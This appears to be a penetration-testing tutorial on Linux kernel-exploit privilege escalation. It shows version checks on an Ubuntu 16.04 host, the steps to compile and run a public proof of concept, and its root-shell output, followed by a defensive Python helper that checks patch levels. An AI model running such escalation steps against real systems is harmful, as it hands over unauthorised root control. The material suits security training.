Kernel Exploits

Privilege escalation using a kernel exploit can be as simple as downloading, compiling, and running it. Some of these exploits work out of the box, while others require modification.

Note: Kernel exploits can cause system instability (a failed exploit may crash the kernel), so use caution when running these against a production system.

Start by checking the Kernel level and Linux OS version.

neutron@kali[/kali]$ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
neutron@kali[/kali]$ cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

We can see that we are on Linux Kernel 4.4.0-116 on an Ubuntu 16.04.4 LTS box. A quick Google search for linux 4.4.0-116-generic exploit comes up with this exploit PoC. Next, download it to the system using wget or another file transfer method. We can compile the exploit code using gcc and set the executable bit using chmod +x.
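The same version check, turned into a small audit helper so it can be run across a fleet rather than eyeballed per host. This is an added example, not code from the original page: it parses the `uname -a` and `/etc/lsb-release` output shown above (embedded here as constructed sample input) and compares the running kernel against a fixed (version, ABI) pair. The fixed ABI number used in the test is a placeholder, not a value taken from any advisory; on Ubuntu the upstream version alone is misleading because fixes are backported under the same 4.4.0 with a higher ABI revision.

```python
import re
from typing import NamedTuple

# Constructed sample input, copied from the terminal output on this page.
UNAME_A = ("Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 "
           "21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux")
LSB_RELEASE = """DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
"""

class KernelInfo(NamedTuple):
    version: tuple   # upstream version, e.g. (4, 4, 0)
    abi: int         # Ubuntu ABI revision, e.g. 116 (this is what patches bump)
    flavour: str     # e.g. "generic"
    build: int       # build number from "#140-Ubuntu"

# Ubuntu release strings look like MAJOR.MINOR.PATCH-ABI-FLAVOUR
_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-([\w-]+)$")
_BUILD_RE = re.compile(r"#(\d+)")

def parse_uname(line: str) -> KernelInfo:
    """Parse one line of `uname -a`; the release string is the third field."""
    release = line.split()[2]
    m = _RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    b = _BUILD_RE.search(line)
    return KernelInfo((int(m[1]), int(m[2]), int(m[3])), int(m[4]), m[5],
                      int(b[1]) if b else 0)

def parse_lsb_release(text: str) -> dict:
    """Turn KEY=VALUE lines into a dict, dropping surrounding quotes."""
    out = {}
    for raw in text.splitlines():
        if "=" in raw:
            k, v = raw.split("=", 1)
            out[k.strip()] = v.strip().strip('"')
    return out

def kernel_is_older(running: KernelInfo, fixed_version: tuple, fixed_abi: int) -> bool:
    """True when the running kernel predates the (version, ABI) that carries the fix.
    The ABI revision breaks ties when the upstream version is equal."""
    return (running.version, running.abi) < (fixed_version, fixed_abi)

if __name__ == "__main__":
    k, d = parse_uname(UNAME_A), parse_lsb_release(LSB_RELEASE)
    print(d["DISTRIB_DESCRIPTION"], k, "older than 4.4.0-117:",
          kernel_is_older(k, (4, 4, 0), 117))   # 117 is a placeholder ABI
```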

neutron@kali[/kali]$ gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit

Run the exploit and hopefully get dropped into a root shell.

neutron@kali[/kali]$ ./kernel_expoit

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

Confirm root access to the box.

root@xyz[/xyz]# whoami

root